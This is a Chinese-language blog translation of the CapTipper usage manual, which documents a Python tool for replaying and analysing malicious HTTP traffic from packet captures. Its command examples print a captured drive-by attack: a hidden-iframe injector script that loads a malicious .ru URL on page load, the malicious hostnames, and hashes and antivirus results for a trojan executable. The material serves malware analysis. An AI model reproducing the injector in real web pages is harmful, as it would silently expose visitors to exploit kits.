A-A+
CapTipper 使用方法详细说明(汉化中文)
【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】
什么是CapTipper?
CapTipper是一个用于分析,探索和恢复HTTP恶意流量的python工具。
CapTipper设置一个Web服务器,其作用与PCAP文件中的服务器完全相同,
并包含内部工具和强大的交互式控制台,用于分析和检查找到的主机,对象和对话。
该工具为安全研究人员提供了对文件的轻松访问和对网络流的理解,
在尝试研究漏洞利用程序,前提条件,版本,混淆,插件和shellcode时非常有用。
使用偷渡式流量捕获(例如,漏洞利用工具包)向CapTipper提供向用户显示已发送的请求URI和响应元数据。
用户此时可以浏览到http://127.0.0.1/(host]/[URI]并将响应接收回浏览器。
此外,还启动了一个交互式shell,以便使用各种命令进行更深入的调查,例如:hosts,hexdump,info,ungzip,body,client,dump等等......
CapTipper根据GPLv3许可发布,版权归Omri Herscovici所有。源代码可在GitHub上获得。
----------个人觉得这个还可以,也有一些弊端吧,不过毕竟最后一次更新也是3年前左右的工具了--------
直白一点的说其实这个工具就是一个相对来说便捷的pcap包的分析工具。虽然没有Wireshark那么详细,但是比它更便捷,更直白吧。
参数
基本用法:
./CapTipper.py [参数]
CapTipper接受命令行参数:
-h, --help 打印此帮助信息并退出
-p PORT, --port PORT 设置Web服务器端口
-d FOLDER, --dump FOLDER 转储所有文件并退出
-s, --server-off 禁用Web服务器
-short, --short-url 显示缩短的URI路径
-r FOLDER, --report FOLDER 创建JSON和HTML报告
-g, --ungzip 自动ungzip响应
-u, --update 将CapTipper更新到最新版本
控制台
CapTipper的初始化以下列格式输出客户端和服务器之间的对话:
[ID] : REQUEST URI -> SERVER RESPONSE TYPE (FILENAME) [SIZE IN BYTES] (Magic: $Whatype)
ID:特定会话的已分配ID
REQUEST URI:在GET请求中发送到服务器的URI
SERVER RESPONSE TYPE:服务器响应头中返回的内容类型
FILENAME:文件名可以是一些东西:
响应头中给出的Filename属性
源自URI
由CapTipper指定,如果找不到上述任何内容
字节大小:响应体型字节
MAGIC:Whatype库标识的文件格式
初始化后,发生了两件事:
CapTipper创建一个伪Web服务器,其行为类似于pcap中的Web服务器
解释器已启动
解释器包含用于进一步调查PCAP文件中对象的内部工具。
在浏览器中打开URI只需键入open对象ID即可。有关Web服务器的更多信息,请参阅Webserver一章。
以下是所有当前可用命令的详细信息。
open
CapTipper启动一个本地Web服务器模仿在PCAP Web服务器(一个或多个)。该open命令获取给定的对话并启动默认浏览器以转到本地Web服务器上的该URL。
例:
CT> open 0
Opening http://localhost:80/ in default browser
log
记录对本地Web服务器的每个请求,并使用以下log命令查看:
CT> log
[2015-07-08T16:25:18.815575] 127.0.0.1 : GET / HTTP/1.1
convs
convs 将以CapTipper启动时显示的形式显示所有会话。
CT> convs
Conversations Found:
0: / -> text/html (0.html) [5.4 KB] (Magic: GZ)
1: /seedadmin17.html -> text/html (seedadmin17.html) [354.0 B] (Magic: HTML)
2: /wp-includes/js/jquery/jquery.js?ver=1.7.2 -> application/javascript (jquery.js) [38.6 KB] (Magic: GZ)
3: /15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html -> text/html (15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html) [110.5 KB] (Magic: HTML)
4: /wp-content/uploads/2014/01/MetroWest_COVER_Issue2_Feb2014.jpg -> image/jpeg (MetroWest_COVER_Issue2_Feb2014.jpg) [341.8 KB] (Magic: JPG)
5: /images/footer/3000melbourne.png -> image/png (3000melbourne.png) [2.9 KB] (Magic: PNG)
6: /images/footer/3207portmelbourne.png -> image/png (3207portmelbourne.png) [3.0 KB] (Magic: PNG)
7: /wp-content/uploads/2012/09/background1.jpg -> image/jpeg (background1.jpg) [32.3 KB] (Magic: JPG)
8: /00015d76d9b2rr9f/1415286120 -> application/octet-stream (00015d76.swf) [30.8 KB] (Magic: SWF)
9: /00015d766423rr9f/1415286120 -> application/pdf (XykpdWhZZ2.pdf) [9.7 KB] (Magic: PDF)
10: /00015d76rr9f/1415286120/5/x00809070554515d565b010b03510053535c0505;1;6 -> application/octet-stream (5.exe) [136.0 KB] (Magic: EXE)
11: /00015d76rr9f/1415286120/5/x00809070554515d565b010b03510053535c0505;1;6;1 -> application/octet-stream (5.exe) [136.0 KB] (Magic: EXE)
12: /00015d76rr9f/1415286120/7 -> application/octet-stream (7.exe) [136.0 KB] (Magic: EXE)
13: /00015d761709rr9f/1415286120 -> application/octet-stream (00015d76.swf) [7.9 KB] (Magic: XAP)
14: /00015d76rr9f/1415286120/8 -> application/octet-stream (8.exe) [136.0 KB] (Magic: EXE)
hosts
该hosts命令允许我们对主机和流量中涉及的URI进行概览。
CT> hosts
Found Hosts:
www.magmedia.com.au (182.160.157.199:80)
├-- / [0]
├-- /wp-includes/js/jquery/jquery.js?ver=1.7.2 [2]
├-- /wp-content/uploads/2014/01/MetroWest_COVER_Issue2_Feb2014.jpg [4]
├-- /images/footer/3000melbourne.png [5]
├-- /images/footer/3207portmelbourne.png [6]
└-- /wp-content/uploads/2012/09/background1.jpg [7]
pixeltouchstudios.tk (108.61.196.84:80)
└-- /seedadmin17.html [1]
grannityrektonaver.co.vu (173.244.195.17:80)
├-- /15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html [3]
├-- /00015d76d9b2rr9f/1415286120 [8]
├-- /00015d766423rr9f/1415286120 [9]
head
head 输出给定的会话响应头。以下是它的帮助信息:
Display header of response
Usage: head
####例如:
CT> head 0
Displaying header of object 0 (0.html):
HTTP/1.1 200 OK
Content-Encoding: gzip
Vary: Accept-Encoding
Transfer-Encoding: chunked
Date: Thu, 06 Nov 2014 15:03:41 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.4.32
X-Pingback: http://www.magmedia.com.au/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Set-Cookie: slimstat_tracking_code=256799id.b66059145c9c6730b88376341fa0a97e; expires=Sun, 07-Dec-2014 15:03:41 GMT; path=/
body
body将会话ID作为参数获取并输出响应主体。以下是它的帮助信息:
1 2 3 4 5 6 7 8 9 10 11 12 13 | Displays the text representation of the body Usage: body <conv_id> [size=256] ###示例: CT> body 1 128 Displaying body of object 1 (seedadmin17.html) [128 bytes]: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The doc |
ungzip
body由于使用GZIP压缩,多次使用该命令将导致无法读取的响应。
CT> body 0
Displaying body of object 0 (0.html) [256 bytes]:
▼ ♦♥─╜i{#╟ס╢√}~♣X╓t♥═"HJצg♀░→o½%Y▓╡ם║m┘CR║
@a!▒P ╪כ ╬o?≈‼╣TJ≥£≈\g╞jó╢\"#cן╚πg ÷ry≤~5↔O6םµ╦Vπ├ףף h|╛*ך╞½σh≤6_§ם╧ק╖כa╛ש.↨iπ╦┼á▌רl67¥ππ╤z╘^«╞╟ ÷∞°▀F╖כב▐hלכ═╦σ≥zZ4≤╓▌¢|╒Φg├σαv^,6φב=h╧≤═`╥\¶o
←▀↨π╧▐▌4ףf»≤π╢█h%חy{U▄╠≥A╤<n₧_┤?Φ=█▐▌_4/Z↨τ↨ק↨↨↨╟↨ח?^╢מ╟irq±┴i
ungzip 获取会话ID作为参数,并使用对象的未压缩数据创建新对象
CT> ungzip 0
GZIP对象0(0.html)的解压缩成功!
创建新对象:15
创建的新对象将添加到对象列表中,并可使用以下objects命令查看:
CT> objects
Displaying Objects:
ID CID TYPE NAME
---- ----- ----------- --------
0 | 0 | body | 0.html
1 | 1 | body | seedadmin17.html
2 | 2 | body | jquery.js
3 | 3 | body | 15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html
4 | 4 | body | MetroWest_COVER_Issue2_Feb2014.jpg
5 | 5 | body | 3000melbourne.png
6 | 6 | body | 3207portmelbourne.png
7 | 7 | body | background1.jpg
8 | 8 | body | 00015d76.swf
9 | 9 | body | XykpdWhZZ2.pdf
10 | 10 | body | 5.exe
11 | 11 | body | 5.exe
12 | 12 | body | 7.exe
13 | 13 | body | 00015d76.swf
14 | 14 | body | 8.exe
15 | 0 | ungzip | ungzip-0.html <---------- 注意这个就是你新创建的对象的文件
REQ
req 获取会话ID作为参数并输出请求数据。例如:
CT> req 0
Displaying request for object 0 (0.html) [633 bytes]:
GET / HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.google.com/url?url=http://www.magmedia.com.au/&rct=j&frm=1&q=&esrc=s&sa=U&ei=uItbVLWHHYGpyASK44CoCQ&ved=0CBUQFjAA&usg=AFQjCNHuIidJc6dJKT_wy-UruJtaHR9Mhg
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.magmedia.com.au
Connection: Keep-Alive
hexdump
该hexdump命令显示给定会话对象的hexdump。与body命令一样,它显示对象的前256个字节,但这可以通过提供第二个size参数来更改。它的帮助信息:
Display hexdump of given object
Usage: hexdump [size=256]
###举例:
CT> hexdump 12
Displaying hexdump of object 12 (7.exe) body [256 bytes]:
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 C8 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 37 62 C4 DA 73 03 AA 89 73 03 AA 89 73 03 AA 89 7b..s...s...s...
0090 F0 1F A4 89 72 03 AA 89 3C 21 A3 89 76 03 AA 89 ....r...<!..v...
00A0 45 25 A7 89 72 03 AA 89 52 69 63 68 73 03 AA 89 E%..r...Richs...
00F0 14 13 00 00 00 10 00 00 00 D0 01 00 00 00 40 00 ..............@.
peinfo
该peinfo显示关于二进制文件有趣的和可疑的信息的基础上,恶意软件菜谱PE扫描仪。它还支持使用-p参数来识别PEiD签名数据库中的打包程序。帮助信息:
Display PE info of the file
Usage: peinfo [-p]
OPTIONS:
-p - Check for packers
###举例:
CT> peinfo 12
Displaying PE info of object 12 (7.exe) [139264 bytes]:
Meta-data
================================================================================
Size: 139264 bytes
MD5: 67291715c45c4594b8866e90fbf5c7c4
SHA1: a86dcb1d04be68a9f2d2373ee55cbe15fd299452
Date: 0x545A5C51 [Wed Nov 5 17:20:17 2014 UTC]
EP: 0x401314 .text 0/3
CRC: Claimed: 0x24dec, Actual: 0x2621d [SUSPICIOUS]
Resource entries
================================================================================
Name RVA Size Lang Sublang Type
--------------------------------------------------------------------------------
RT_ICON 0x22980 0xea8 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_ICON 0x218d8 0x10a8 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_ICON 0x21470 0x468 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_ICON 0x21108 0x368 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_ICON 0x20460 0xca8 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_GROUP_ICON 0x20414 0x4c LANG_NEUTRAL SUBLANG_NEUTRAL
RT_VERSION 0x201b0 0x264 LANG_ENGLISH SUBLANG_ENGLISH_US
Sections
================================================================================
Name VirtAddr VirtSize RawSize Entropy
--------------------------------------------------------------------------------
.text 0x1000 0x1b5d8 0x1c000 6.635876
.data 0x1d000 0x2128 0x1000 0.000000
.rsrc 0x20000 0x3828 0x4000 4.580442
Version info
================================================================================
Translation: 0x0409 0x04b0
InternalName: ProV
FileVersion: 3.07
CompanyName: VSO Software
Comments: All rights reserved
ProductName: Filmf\xf6rderanstalten
ProductVersion: 3.07
OriginalFilename: ProV.exe
info
info 将显示与给定对话相关的原始包数据,例如:
Server IP and PORT
Packet sent time
Host
URI
Referrer
Request Method
Result number
Result content type
File name
File type as identified by Whatype
Response size
###使用方法:
CT> help info
Display info on object
Usage: info
###示例:
CT> info 1
Info of conversation 1:
SERVER IP : 108.61.196.84:80
TIME : Thu, 11/06/14 15:02:38
HOST : pixeltouchstudios.tk
URI : /seedadmin17.html
REFERER : http://www.magmedia.com.au/
METHOD : GET
RESULT NUM : 302 Found
RESULT TYPE : text/html
FILE NAME : seedadmin17.html
MAGIC : HyperText Markup Language (HTML)
LENGTH : 354 B
plugin
CapTipper支持外部插件。有关插件基础结构的大量信息可以在插件章节中找到。该plugin命令允许用户使用存储在plugins\文件夹中的插件。它的帮助信息:
CT> help plugin
Launching an external plugin (alias: p)
usage: plugin [-l] <*args>
-l - List all available plugins 列出所有可用的插件
examples:
plugin find_scripts
plugin 1
p find_scripts
列出所有可用的插件:
CT> plugin -l
Loaded Plugins (3):
0 : check_host - 检查给定id的主机是否存活
1 : find_scripts - 查找对象主体中包含的外部脚本
2 : print_body - 打印会话正文并根据需要进行ungzip
该plugin命令也可以由其别名使用p。
每个插件都分配有唯一的ID,因此插件的使用可以通过其名称或ID来完成。
例如,我们可以使用check_host已0分配id 的插件。此插件接收会话ID作为参数,并检查托管会话URL的域是否存活。让我们通过对话使用插件12:
CT> p 0 12
正在检查主机grannityrektonaver.co.vu
IP:PORT = 173.244.195.17:80
[ - ]服务器已经死了
dump
该dump命令将给定的对象ID或PCAP中找到的所有文件写入磁盘。它的帮助信息:
###将目标文件转储到给定的文件夹
Usage: dump [-e]
Options:
-e - ignores executables
###示例:
dump 4 c:\files\index.html
将对象4转储到给定路径
dump all c:\files
按所找到的名称将所有文件转储到文件夹
dump all c:\files -e
将所有文件按其找到的名称转储到文件夹,而不使用EXE文件
objects
该objects命令显示Core章节中描述的对象列表。
CT> objects
Displaying Objects:
ID CID TYPE NAME
---- ----- ----------- --------
0 | 0 | body | 0.html
1 | 1 | body | seedadmin17.html
2 | 2 | body | jquery.js
3 | 3 | body | 15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html
4 | 4 | body | MetroWest_COVER_Issue2_Feb2014.jpg
5 | 5 | body | 3000melbourne.png
6 | 6 | body | 3207portmelbourne.png
7 | 7 | body | background1.jpg
8 | 8 | body | 00015d76.swf
9 | 9 | body | XykpdWhZZ2.pdf
10 | 10 | body | 5.exe
11 | 11 | body | 5.exe
12 | 12 | body | 7.exe
13 | 13 | body | 00015d76.swf
14 | 14 | body | 8.exe
find
该find命令搜索给定对话或所有对话中给定正则表达式的所有出现。它的帮助信息:
###在所有或特定对象中搜索正则表达式
Usage: find
Output data is displayed as follows:
([Line number] , [Offset from begining of file]) : [Found string]
建议使用-g标志启动CapTipper,以便自动解压缩所有对象并提高搜索效率。
在所有对象中搜索域rabiorik的示例:
CT> find all rabiorik
Searching 'rabiorik' in all objects:
0.html [0]:
(777,50587) : t(){create_frame("http://rabiorik.ru/wlkzkir.cgi?default")
wlkzkir.cgi [7]:
(8,256) : 22 (@RELEASE@) Server at rabiorik.ru Port 80</b
以下,以及在特定对象中搜索create_frame的示例:
CT> find 0 create_frame
Searching 'create_frame' in object 0 (0.html):
(777,50213) : xt/javascript'>function create_frame(a){var b=document.getEle
(777,50566) : true}}function bdsls4t(){create_frame("http://rabiorik.ru/wlkz
slice
该命令slice显示来自对象的指定范围的字节(子字符串)。它的帮助信息:
###以给定长度从offset返回字节
Usage: slice
在之前的使用之后find,我们可以通过从其起始位置请求256个字节来检查“create_frame”javascript函数。 slice接受object-id(0),offset start(50213)和length(256):
CT> slice 0 50213 256
Displaying 256 of bytes from offset 50213 in object 0 (0.html):
create_frame(a){var b=document.getElementById('weqe');if(typeof(b)!='undefined'&&b!=null){}
else{var c=document.createElement('iframe');c.id="weqe";c.style.width="0px";c.style.height="0px";
c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setA
它还包括对EOB(End Of Block)检测的支持。这将告诉slice显示代码,直到我们正在查看的当前块结束,无论是类,函数还是语句(基于大括号{})。
使用eob参数而不是长度值,例如:
CT> slice 0 50213 eob
Displaying 334 of bytes from offset 50213 in object 0 (0.html):
create_frame(a){var b=document.getElementById('weqe');if(typeof(b)!='undefined'&&b!=null){}
else{var c=document.createElement('iframe');c.id="weqe";c.style.width="0px";c.style.height="0px";
c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");
document.body.appendChild(c);c.src=a;return true}}
如果我们希望能够更方便地读取代码,我们可以使用该jsbeautify命令。
jsbeautify
的jsbeautify(JavaScript的美化)命令重新格式化的代码更人类可读的,用于深度检测非常有用的。它的帮助信息:
###美化后显示JavaScript代码
Usage: jsbeautify
Example: jsbeautify slice
Example: jsbeautify obj
jsbeautify可以接受对话对象并创建一个新对象。(新对象可以转储到文件系统):
CT> jsbeautify obj 8
JavaScript Beautify of object 8 (jquery.ui.effect.min.js) successful!
New object created: 16
比如ungzip,创建的新对象可以使用objects。
jsbeautify也可以接受slice上一节中看到的命令。
jsbeautifyjavascript代码中“create_frame”函数的示例,与slice命令结合使用。
CT> jsbeautify slice 0 50213 512
create_frame(a) {
var b = document.getElementById('weqe');
if (typeof(b) != 'undefined' && b != null) {} else {
var c = document.createElement('iframe');
c.id = "weqe";
c.style.width = "0px";
c.style.height = "0px";
c.style.border = "0px";
c.frameBorder = "0";
c.style.display = "none";
c.setAttribute("frameBorder", "0");
document.body.appendChild(c);
c.src = a;
return true
}
}
function bdsls4t() {
create_frame("http://rabiorik.ru/wlkzkir.cgi?default")
}
try {
if (window.attachEvent) {
window.attachEvent('onload', bdsls4t)
} else {
if (window.onload) {
var curronload = wi
###可以说这个命令很实用的说。
VT
vt 将给定的对象ID MD5发送到VirusTotal,以查看它是否被任何反病毒提供程序识别。使用vt需要VirusTotal Public API密钥。例如:
CT> vt 14
VirusTotal result for object 14 (8.exe):
Detection: 46/57
Last Analysis Date: 2015-04-09 12:37:31
Report Link: https://www.virustotal.com/file/955e4e4a56bf80a30636b0c34673cdd6a889aff6569331a5336e1606e7c1050c/analysis/1428583051/
Scan Result:
MicroWorld-eScan Trojan.GenericKD.1961906 12.0.250.0 20150409
nProtect Trojan.GenericKD.1961906 2015-04-09.02 20150409
CAT-QuickHeal TrojanPWS.Zbot.rw3 14.00 20150409
McAfee Generic.vd 6.0.5.614 20150409
Malwarebytes Trojan.Dorkbot.ED 1.75.0.1 20150409
VIPRE Trojan.Win32.Generic.pak!cobra 39190 20150409
BitDefender Trojan.GenericKD.1961906 7.2 20150409
K7GW Trojan ( 004b065c1 ) 9.202.15539 20150409
K7AntiVirus Trojan ( 004b065c1 ) 9.202.15538 20150409
Agnitum Trojan.Injector!qCiqLIlbpUs 5.5.1.3 20150408
F-Prot W32/Injector.OA 4.7.1.166 20150409
Symantec Infostealer.Limitail 20141.2.0.56 20150409
Norman Injector.HKVF 7.04.04 20150409
TotalDefense Win32/Tofsee.CQVQOaC 37.0.11540 20150409
TrendMicro-HouseCall TROJ_SPNV.01KC14 9.700.0.1001 20150409
Avast Win32:VB-AIWF [Trj] 8.0.1489.320 20150409
Kaspersky Trojan.Win32.VB.ctmy 15.0.1.10 20150409
NANO-Antivirus Trojan.Win32.Spambot.dippmr 0.30.10.952 20150409
ViRobot Trojan.Win32.R.Agent.139264[h] 2014.3.20.0 20150409
Rising PE:Malware.XPACK-HIE/Heur!1.9C48 25.0.0.17 20150409
Ad-Aware Trojan.GenericKD.1961906 12.0.163.0 20150409
Emsisoft Trojan.GenericKD.1961906 (B) 3.0.0.600 20150409
Comodo UnclassifiedMalware 21701 20150409
F-Secure Trojan.GenericKD.1961906 11.0.19100.45 20150409
DrWeb Trojan.Spambot.12689 7.0.12.3050 20150409
Zillya Trojan.VB.Win32.129714 2.0.0.2132 20150408
TrendMicro TROJ_SPNV.01KC14 9.740.0.1012 20150409
McAfee-GW-Edition BehavesLike.Win32.AAEH.ch v2015 20150409
Sophos Mal/Generic-L 4.98.0 20150409
Cyren W32/Injector.CFDL-3956 5.4.16.7 20150409
Avira TR/Injector.139264.29 3.6.1.96 20150409
Antiy-AVL Trojan/Win32.SGeneric 1.0.0.1 20150409
Microsoft Backdoor:Win32/Tofsee.F 1.1.11502.0 20150409
AhnLab-V3 Trojan/Win32.MDA 2015.04.09.00 20150408
GData Trojan.GenericKD.1961906 25 20150409
ALYac Trojan.GenericKD.1961906 1.0.1.4 20150409
AVware Trojan.Win32.Generic.pak!cobra 1.5.0.21 20150409
Panda Trj/WLT.B 4.6.4.2 20150408
Zoner Trojan.Tofsee.AX 1.0 20150407
ESET-NOD32 Win32/Tofsee.AX 11448 20150409
Tencent Trojan.Win32.Qudamah.Gen.17 1.0.0.1 20150409
Ikarus Trojan-Spy.Agent T3.1.8.9.0 20150409
Fortinet W32/BOVZ!tr 5.0.999.0 20150409
AVG Inject2.BDIT 15.0.0.4328 20150409
Baidu-International Trojan.Win32.VB.ctmy 3.5.1.41473 20150409
Qihoo-360 HEUR/QVM03.0.Malware.Gen 1.0.0.1015 20150409
这个我要解释一下,好像是把你下载的exe程序的md5提取出来,然后提交到病毒中心进行分析。
iframes
该iframes命令搜索iframe标记作为html源的一部分。
CT> iframes 2
Searching for iframes in object 2 (jquery.js)...
1 iframe(s) Found!
[I] 1 : http://pixeltouchstudios.tk/seedadmin17.html
client
显示PCAP中找到的客户端上的所有收集数据。
CT> client
Client Info:
IP : 192.168.204.136
MAC : 00:0c:29:64:76:eb
USER-AGENT : Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
X-FLASH-VERSION : 11,8,800,94
ziplist
该ziplist命令接收一个包含ZIP文件的对象ID,并显示存储在其中的所有文件和文件夹。例如:
CT> ziplist 6
12 Files found in zip object 6 (QrWusuR.jar):
[Z] 1 : META-INF/
[Z] 2 : META-INF/MANIFEST.MF
[Z] 3 : bDNxrqYgNO.class
[Z] 4 : dNMU.class
[Z] 5 : dxQegSHi.class
[Z] 6 : EzAD.class
[Z] 7 : ICrWA.class
[Z] 8 : lcaOISBn.class
[Z] 9 : pmd.class
[Z] 10 : thXEdm.class
[Z] 11 : YWbTSCCIk.class
[Z] 12 : eqx.ps
output
该output命令将所有控制台命令和结果记录到文件中。这是通过覆盖来完成的sys.stdout。
CT> output /Users/omriher/Temp/Nuclear-110615.txt
Logging to /Users/omriher/Temp/Nuclear-110615.txt
日志记录仅包括使用该output命令后的数据。为了停止使用日志stop作为命令参数。
CT> output stop
Stopped logging to /Users/omriher/Temp/Nuclear-110615.txt
strings
该strings命令获取一个对象id并返回该对象中找到的所有字符串。例如:
CT> strings 14
Strings found in object 14 (8.exe) [139264 bytes]:
!This program cannot be run in DOS mode.
Richs
.text
`.data
.rsrc
MSVBVM60.DLL
Meistillustriertes
JGd:O
Kontrollmodus
Baustoffkartelle5
Kontrollmodus
Kanonenfeuerunterst
tzungen57
...
hashes
该hashes命令显示给定对象的所有可用哈希值。
CT>哈希14
对象14(8.exe)的哈希:
md5:67291715c45c4594b8866e90fbf5c7c4
sha1:a86dcb1d04be68a9f2d2373ee55cbe15fd299452
sha224:6cc5585425cbb8b656ac4d12ce6331561df705787a0f8036b5f47eed
sha256:955e4e4a56bf80a30636b0c34673cdd6a889aff6569331a5336e1606e7c1050c
sha384:a207d38c964a0736adb86e74ea20ae5737afea9bfc87b7126ebb6d628432f6261dcef15cacf3b3bc14b072374dadf676
sha512:703a9a69239ffe3bddf44fecf09136cb1e9872708d8e3d2d39f9904a4cc075d9e63d6b421bea8f1affeef855f8d9c5b903a517779777febaa84521824b4a07e1
翻译自官方地址:https://captipper.readthedocs.io/en/latest/Usage.html
布施恩德可便相知重
微信扫一扫打赏
支付宝扫一扫打赏